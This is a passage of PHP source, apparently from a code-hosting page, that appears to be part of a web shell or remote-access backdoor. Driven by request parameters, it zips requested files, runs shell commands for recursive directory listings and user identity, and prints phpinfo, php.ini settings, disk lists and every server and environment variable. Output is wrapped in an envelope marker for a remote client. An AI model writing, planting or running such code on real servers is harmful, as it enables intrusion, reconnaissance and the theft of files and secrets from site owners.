$ffrs = trim($ffrs);
$files = preg_split("/\s+/", $ffrs, -1, PREG_SPLIT_NO_EMPTY);
$output = make_zip($files);
echo $output;
}
if (!empty($dfr))
{
if (!$use_exec)
{
$dfr = trim($dfr);
$output .= safe_dir($dfr);
}
if (!$safe_mode && empty($output))
{
if ($unix)
{
$output .= command("ls -liaL $dfr");
} else {
$output .= command("dir /a $dfr");
}
}
if ($compress) compress($output);
echo $output;
}
if (!empty($dfra))
{
$recur_limit = !empty($_REQUEST['rlimit']) ? $_REQUEST['rlimit'] : 0;
if (!$use_exec)
{
$dfra = trim($dfra);
$output .= safe_dir($dfra, true, $recur_limit);
}
if (!$safe_mode && empty($output))
{
if ($unix)
{
$output .= command("ls -liRaL $dfra");
} else {
$output .= command("dir /S /a $dfra");
}
}
if ($compress) compress($output);
echo $output;
}
if (!empty($info))
{
$output = '';
switch ($info)
{
case 'ver':
$output = $version;
if ($safe_mode) $output .= " (safe mode)";
break;
case 'uname':
$output = get_uname();
break;
case 'id':
if (!$safe_mode)
{
if($unix) {
$output = command("id");
} else {
$output = command("whoami");
}
$output = trim($output);
}
if (empty($output))
{
$found = 0;
if (function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
{
$euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
if ($euserinfo || $egroupinfo)
{
$output = 'uid='.$euserinfo['uid'].'('.$euserinfo['name'].') gid='.$egroupinfo['gid'].'('.$egroupinfo['name'].')';
$found = 1;
}
}
if (!$found)
{
if (function_exists('get_current_user'))
$output .= "user=".@get_current_user();
if (function_exists('getmyuid'))
$output .= " uid=".@getmyuid();
if (function_exists('getmygid'))
$output .= " gid=".@getmygid();
}
}
break;
case 'pwd':
$output = get_cwd();
break;
case 'safe-mode':
$output = $safe_mode ? '1' : '0';
break;
case 'unix-os':
$output = $unix ? '1': '0';
break;
case 'php-info':
$output = @phpinfo(-1);
break;
case 'php-ini':
if (function_exists('ini_get_all'))
{
foreach (@ini_get_all() as $key=>$value)
{
$output .= "$key"."".U_value($value['local_value'])."".U_value($value['global_value'])."\n";
}
}
break;
case 'disk':
$name = $REQUEST['rname'];
if (empty($name))
if ($unix)
$name = "/";
else
$name = "\\";
$output = @disk_free_space($name)."/".@disk_total_space($name);
break;
case 'disk-list':
for ($disk = 'C'; $disk < 'Z'; ++$disk)
{
if (@disk_total_space("$disk:"))
{
$output .= "$disk:\n";
}
}
break;
case 'env':
if ($_SERVER)
{
foreach ($_SERVER as $key=>$value)
{
$output .= "$key:".U_value($value)."\n";
}
} else {
global $HTTP_SERVER_VARS;
foreach ($HTTP_SERVER_VARS as $key=>$value)
{
$output .= "$key:".U_value($value)."\n";
}
}
$cmdenv = '';
if (!$safe_mode)
{
if ($unix) $cmdenv = command('env');
else $cmdenv = command('set');
}
if (!empty($cmdenv))
{
$output .= @join(":", split("=", $cmdenv));
} else {
if ($_ENV)
{
foreach ($_ENV as $key=>$value)
{
$output .= "$key:".U_value($value)."\n";
}
} else {
global $HTTP_ENV_VARS;
foreach ($HTTP_ENV_VARS as $key=>$value)
{
$output .= "$key:".U_value($value)."\n";
}
}
}
break;
}
if ($compress) compress($output);
echo $output;
}
if ($envelope)
{
echo '__STOP__9034785902347509238476034857607834__STOP__';
die;
}
?>
Reference in New Issue Copy Permalink